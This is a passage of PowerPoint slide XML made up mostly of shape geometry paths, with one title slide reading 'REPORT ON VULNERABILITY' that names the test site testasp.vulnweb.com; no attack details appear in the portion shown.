              <a:gd name="connsiteY49" fmla="*/ 531129 h 1552307"/>
              <a:gd name="connsiteX50" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 455936 h 1552307"/>
              <a:gd name="connsiteX51" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 409302 h 1552307"/>
              <a:gd name="connsiteX52" fmla="*/ 8275980 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 267262 h 1552307"/>
              <a:gd name="connsiteX53" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 208471 h 1552307"/>
              <a:gd name="connsiteX54" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 161973 h 1552307"/>
              <a:gd name="connsiteX55" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 152111 h 1552307"/>
              <a:gd name="connsiteX56" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 112232 h 1552307"/>
              <a:gd name="connsiteX57" fmla="*/ 9098594 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 73185 h 1552307"/>
              <a:gd name="connsiteX58" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 24074 h 1552307"/>
              <a:gd name="connsiteX59" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 0 h 1552307"/>
              <a:gd name="connsiteX60" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1552307"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 1475444 h 1552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9288370" h="1552307">
                <a:moveTo>
                  <a:pt x="0" y="1475444"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="350" y="1475362"/>
                  <a:pt x="85070" y="1525412"/>
                  <a:pt x="85420" y="1525330"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="159046" y="1498807"/>
                  <a:pt x="140452" y="1580341"/>
                  <a:pt x="358599" y="1541734"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="415987" y="1514342"/>
                  <a:pt x="404325" y="1571886"/>
                  <a:pt x="611906" y="1537813"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="658343" y="1532409"/>
                  <a:pt x="866522" y="1526192"/>
                  <a:pt x="940788" y="1506488"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="999849" y="1503681"/>
                  <a:pt x="943202" y="1532786"/>
                  <a:pt x="1032523" y="1513858"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1144951" y="1524944"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1234244" y="1531166"/>
                  <a:pt x="1319480" y="1518954"/>
                  <a:pt x="1408773" y="1503055"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1651466" y="1459150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1704699" y="1453746"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1730210" y="1444472"/>
                  <a:pt x="1730257" y="1466970"/>
                  <a:pt x="1794234" y="1452327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1842539" y="1416777"/>
                  <a:pt x="1920661" y="1445458"/>
                  <a:pt x="2101780" y="1409907"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2138594" y="1385934"/>
                  <a:pt x="2202709" y="1415076"/>
                  <a:pt x="2253639" y="1396542"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2623862" y="1365980"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2648900" y="1364546"/>
                  <a:pt x="2669117" y="1360488"/>
                  <a:pt x="2707413" y="1359160"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2743721" y="1336539"/>
                  <a:pt x="2798213" y="1353269"/>
                  <a:pt x="2843134" y="1323561"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2859865" y="1315298"/>
                  <a:pt x="2912970" y="1306041"/>
                  <a:pt x="2923804" y="1314224"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2935040" y="1314339"/>
                  <a:pt x="2947659" y="1308371"/>
                  <a:pt x="2953618" y="1318186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2963089" y="1329568"/>
                  <a:pt x="3000111" y="1302355"/>
                  <a:pt x="2995816" y="1318670"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3062330" y="1309669"/>
                  <a:pt x="3244113" y="1294731"/>
                  <a:pt x="3352700" y="1264183"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3444611" y="1236739"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3513098" y="1213406"/>
                  <a:pt x="3581585" y="1223860"/>
                  <a:pt x="3650072" y="1217421"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3683717" y="1219648"/>
                  <a:pt x="3669967" y="1235157"/>
                  <a:pt x="3707853" y="1241722"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3753776" y="1247777"/>
                  <a:pt x="3884527" y="1250073"/>
                  <a:pt x="3925616" y="1253751"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3936659" y="1256176"/>
                  <a:pt x="3949946" y="1252887"/>
                  <a:pt x="3954387" y="1263789"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3962052" y="1276954"/>
                  <a:pt x="4002445" y="1257743"/>
                  <a:pt x="3995849" y="1272939"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4024501" y="1259800"/>
                  <a:pt x="4044699" y="1287470"/>
                  <a:pt x="4067546" y="1294697"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4190310" y="1307786"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4201670" y="1307054"/>
                  <a:pt x="4216873" y="1303173"/>
                  <a:pt x="4230008" y="1303546"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4327992" y="1270528"/>
                  <a:pt x="4508090" y="1267792"/>
                  <a:pt x="4575478" y="1261726"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4650026" y="1265798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4792008" y="1243899"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4864797" y="1217989"/>
                  <a:pt x="4892960" y="1244893"/>
                  <a:pt x="4954126" y="1204617"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5072643" y="1179171"/>
                  <a:pt x="5136253" y="1145277"/>
                  <a:pt x="5309678" y="1128278"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5365406" y="1122815"/>
                  <a:pt x="5419708" y="1103537"/>
                  <a:pt x="5474724" y="1091167"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5612132" y="1051509"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5662448" y="1045154"/>
                  <a:pt x="5747676" y="1053086"/>
                  <a:pt x="5776618" y="1053037"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5785786" y="1051213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5829381" y="1046878"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5855683" y="1045549"/>
                  <a:pt x="5917537" y="1045151"/>
                  <a:pt x="5943596" y="1043237"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5955032" y="1029831"/>
                  <a:pt x="5969545" y="1030469"/>
                  <a:pt x="5985730" y="1035396"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6020901" y="1022497"/>
                  <a:pt x="6059962" y="1025742"/>
                  <a:pt x="6103109" y="1019019"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6142495" y="996126"/>
                  <a:pt x="6176341" y="992625"/>
                  <a:pt x="6222406" y="985341"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6305000" y="965848"/>
                  <a:pt x="6389790" y="916113"/>
                  <a:pt x="6598672" y="902062"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6696217" y="878308"/>
                  <a:pt x="6705019" y="864412"/>
                  <a:pt x="6766149" y="846132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6751303" y="824906"/>
                  <a:pt x="6844288" y="800250"/>
                  <a:pt x="6886312" y="781877"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6904346" y="796722"/>
                  <a:pt x="6974811" y="693660"/>
                  <a:pt x="7006457" y="699758"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7015878" y="688760"/>
                  <a:pt x="7169942" y="678731"/>
                  <a:pt x="7231643" y="640778"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7291087" y="623099"/>
                  <a:pt x="7308597" y="611957"/>
                  <a:pt x="7363123" y="593682"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7401879" y="595559"/>
                  <a:pt x="7546060" y="516035"/>
                  <a:pt x="7588368" y="531129"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7589802" y="511039"/>
                  <a:pt x="7775022" y="480542"/>
                  <a:pt x="7782741" y="455936"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7843362" y="435631"/>
                  <a:pt x="7869887" y="440748"/>
                  <a:pt x="7952094" y="409302"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8034301" y="377856"/>
                  <a:pt x="8226184" y="265410"/>
                  <a:pt x="8275980" y="267262"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8349971" y="264633"/>
                  <a:pt x="8372109" y="226019"/>
                  <a:pt x="8428864" y="208471"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8485619" y="190923"/>
                  <a:pt x="8456819" y="173248"/>
                  <a:pt x="8616510" y="161973"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8658196" y="158015"/>
                  <a:pt x="8776576" y="160401"/>
                  <a:pt x="8826766" y="152111"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8917647" y="112232"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8976899" y="93075"/>
                  <a:pt x="8942036" y="129395"/>
                  <a:pt x="9098594" y="73185"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9113629" y="71738"/>
                  <a:pt x="9214647" y="30863"/>
                  <a:pt x="9232990" y="24074"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9288370" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1475444"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3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>
            <a:innerShdw blurRad="63500" dist="12700" dir="54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69527"/>
            <a:ext cx="10000343" cy="873071"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:latin typeface="Berlin Sans FB Demi"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>REPORT ON VULNERABILITY</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000">
              <a:latin typeface="Berlin Sans FB Dem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25663" y="2052650"/>
            <a:ext cx="4085617" cy="945222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 sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>WEBSITE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7B3399"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1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http://testasp.vulnweb.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="7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450FBA5D-3C8A-4C32-B7D0-B45D4B660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AA390F2-69E0-4B2C-9EAB-28CCAE238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775" y="4999846"/>
            <a:ext cx="9288370" cy="1858154"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst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9288370" h="1858154">
                <a:moveTo>
                  <a:pt x="0" y="1858154"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1049" y="1857909"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="74675" y="1831386"/>
                  <a:pt x="218534" y="1803822"/>
                  <a:pt x="370426" y="1702965"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="508969" y="1649765"/>
                  <a:pt x="440682" y="1619463"/>
                  <a:pt x="832307" y="1538702"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="878744" y="1533298"/>
                  <a:pt x="897351" y="1542198"/>
                  <a:pt x="971617" y="1522494"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1030678" y="1519687"/>
                  <a:pt x="1097347" y="1540789"/>
                  <a:pt x="1186668" y="1521861"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1456865" y="1510292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1463005" y="1511279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1604999" y="1513599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1717911" y="1497764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1743422" y="1488490"/>
                  <a:pt x="1730257" y="1478974"/>
                  <a:pt x="1794234" y="1464331"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1842539" y="1428781"/>
                  <a:pt x="1920661" y="1445458"/>
                  <a:pt x="2101780" y="1409907"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2138594" y="1385934"/>
                  <a:pt x="2193900" y="1407074"/>
                  <a:pt x="2244830" y="1388540"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2310706" y="1379336"/>
                  <a:pt x="2366733" y="1379060"/>
                  <a:pt x="2428648" y="1372736"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2495490" y="1364975"/>
                  <a:pt x="2599421" y="1346234"/>
                  <a:pt x="2645882" y="1341971"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2670920" y="1340537"/>
                  <a:pt x="2669117" y="1348484"/>
                  <a:pt x="2707413" y="1347156"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2743721" y="1324535"/>
                  <a:pt x="2798213" y="1353269"/>
                  <a:pt x="2843134" y="1323561"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2859865" y="1315298"/>
                  <a:pt x="2912970" y="1306041"/>
                  <a:pt x="2923804" y="1314224"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2935040" y="1314339"/>
                  <a:pt x="2947659" y="1308371"/>
                  <a:pt x="2953618" y="1318186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2963089" y="1329568"/>
                  <a:pt x="3000111" y="1302355"/>
                  <a:pt x="2995816" y="1318670"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3062330" y="1309669"/>
                  <a:pt x="3244113" y="1294731"/>
                  <a:pt x="3352700" y="1264183"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3444611" y="1236739"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3513098" y="1213406"/>
                  <a:pt x="3581585" y="1223860"/>
                  <a:pt x="3650072" y="1217421"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3683717" y="1219648"/>
                  <a:pt x="3669967" y="1235157"/>
                  <a:pt x="3707853" y="1241722"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3753776" y="1247777"/>
                  <a:pt x="3884527" y="1250073"/>
                  <a:pt x="3925616" y="1253751"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3936659" y="1256176"/>
                  <a:pt x="3949946" y="1252887"/>
                  <a:pt x="3954387" y="1263789"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3962052" y="1276954"/>
                  <a:pt x="4002445" y="1257743"/>
                  <a:pt x="3995849" y="1272939"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4024501" y="1259800"/>
                  <a:pt x="4044699" y="1287470"/>
                  <a:pt x="4067546" y="1294697"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4190310" y="1307786"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4201670" y="1307054"/>
                  <a:pt x="4216873" y="1303173"/>
                  <a:pt x="4230008" y="1303546"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4327992" y="1270528"/>
                  <a:pt x="4508090" y="1267792"/>
                  <a:pt x="4575478" y="1261726"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4650026" y="1265798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4792008" y="1243899"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4864797" y="1217989"/>
                  <a:pt x="4892960" y="1244893"/>
                  <a:pt x="4954126" y="1204617"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5072643" y="1179171"/>
                  <a:pt x="5136253" y="1145277"/>
                  <a:pt x="5309678" y="1128278"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5365406" y="1122815"/>
                  <a:pt x="5419708" y="1103537"/>
                  <a:pt x="5474724" y="1091167"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5612132" y="1051509"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5662448" y="1045154"/>
                  <a:pt x="5747676" y="1053086"/>
                  <a:pt x="5776618" y="1053037"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5785786" y="1051213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5829381" y="1046878"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5855683" y="1045549"/>
                  <a:pt x="5917537" y="1045151"/>
                  <a:pt x="5943596" y="1043237"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5955032" y="1029831"/>
                  <a:pt x="5969545" y="1030469"/>
                  <a:pt x="5985730" y="1035396"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6020901" y="1022497"/>
                  <a:pt x="6059962" y="1025742"/>
                  <a:pt x="6103109" y="1019019"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6142495" y="996126"/>
                  <a:pt x="6176341" y="992625"/>
                  <a:pt x="6222406" y="985341"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6305000" y="965848"/>
                  <a:pt x="6389790" y="916113"/>
                  <a:pt x="6598672" y="902062"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6696217" y="878308"/>
                  <a:pt x="6705019" y="864412"/>
                  <a:pt x="6766149" y="846132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6828622" y="816303"/>
                  <a:pt x="6844288" y="800250"/>
                  <a:pt x="6886312" y="781877"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6904346" y="770915"/>
                  <a:pt x="6974811" y="693660"/>
                  <a:pt x="7006457" y="699758"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7015878" y="688760"/>
                  <a:pt x="7169942" y="678731"/>
                  <a:pt x="7231643" y="640778"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7291087" y="623099"/>
                  <a:pt x="7308597" y="611957"/>
                  <a:pt x="7363123" y="593682"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7401879" y="595559"/>
                  <a:pt x="7517574" y="550445"/>
                  <a:pt x="7588368" y="531129"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7669636" y="521516"/>
                  <a:pt x="7844833" y="454614"/>
                  <a:pt x="7952094" y="409302"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8059356" y="363990"/>
                  <a:pt x="8146910" y="253405"/>
                  <a:pt x="8231938" y="259259"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8305929" y="256630"/>
                  <a:pt x="8363222" y="225400"/>
                  <a:pt x="8428864" y="208471"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8491413" y="192972"/>
                  <a:pt x="8456819" y="173248"/>
                  <a:pt x="8616510" y="161973"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8658196" y="158015"/>
                  <a:pt x="8776576" y="160401"/>
                  <a:pt x="8826766" y="152111"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8917647" y="112232"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8976899" y="93075"/>
                  <a:pt x="9069756" y="89380"/>
                  <a:pt x="9182272" y="37171"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9197307" y="35724"/>
                  <a:pt x="9214647" y="30863"/>
                  <a:pt x="9232990" y="24074"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9288370" y="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>
            <a:innerShdw blurRad="63500" dist="12700" dir="54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4C0170-3916-4625-8190-2E3BF113A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103" y="487315"/>
            <a:ext cx="10912569" cy="5791049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EFEEE9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6635C4B-3F48-43A3-9A0A-CF504D11BF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1987" r="-2" b="3929"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="763910" y="568496"/>
            <a:ext cx="10664180" cy="5643595"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10664180" h="5643595">
                <a:moveTo>
                  <a:pt x="7783862" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7825995" y="814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7880725" y="6056"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7898827" y="10110"/>
                  <a:pt x="7915172" y="26698"/>
                  <a:pt x="7937519" y="18215"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7993067" y="28825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8092523" y="28825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8841782" y="28825"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8860524" y="25507"/>
                  <a:pt x="8867328" y="19308"/>
                  <a:pt x="8898007" y="18870"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8952668" y="28825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10627331" y="28825"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10647618" y="28876"/>
                  <a:pt x="10664064" y="44670"/>
                  <a:pt x="10664180" y="64204"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10664180" y="2653338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10664180" y="2970007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10664180" y="5559141"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10664128" y="5578714"/>
                  <a:pt x="10647661" y="5594566"/>
                  <a:pt x="10627331" y="5594621"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6666054" y="5594621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4262178" y="5594621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4260736" y="5594853"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4203580" y="5600785"/>
                  <a:pt x="4045152" y="5601986"/>
                  <a:pt x="4052742" y="5594778"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4018513" y="5594621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3590184" y="5594621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2939885" y="5594621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2187618" y="5594621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2169611" y="5596192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2099477" y="5605909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2084498" y="5611360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2067018" y="5606704"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2064869" y="5605333"/>
                  <a:pt x="2063119" y="5603792"/>
                  <a:pt x="2061819" y="5602137"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2006031" y="5611206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1999286" y="5611460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1952782" y="5610177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1883613" y="5603551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1861409" y="5594621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1602390" y="5594621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1595319" y="5596003"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1591870" y="5597868"/>
                  <a:pt x="1590021" y="5600896"/>
                  <a:pt x="1590870" y="5605733"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1582824" y="5605249"/>
                  <a:pt x="1574887" y="5603967"/>
                  <a:pt x="1566886" y="5602486"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1562693" y="5601724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1547107" y="5603076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1541234" y="5597953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1488434" y="5600070"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1465875" y="5613995"/>
                  <a:pt x="1423199" y="5607614"/>
                  <a:pt x="1387812" y="5613769"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1372308" y="5619375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269708" y="5628327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1199575" y="5638044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1184597" y="5643495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1167116" y="5638839"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1164967" y="5637468"/>
                  <a:pt x="1163217" y="5635928"/>
                  <a:pt x="1161916" y="5634272"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1106129" y="5643341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1099384" y="5643595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1052881" y="5642312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="983712" y="5635687"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="960832" y="5630564"/>
                  <a:pt x="940175" y="5609600"/>
                  <a:pt x="911933" y="5620321"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="918189" y="5608452"/>
                  <a:pt x="878387" y="5624096"/>
                  <a:pt x="870493" y="5614082"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="865855" y="5605753"/>
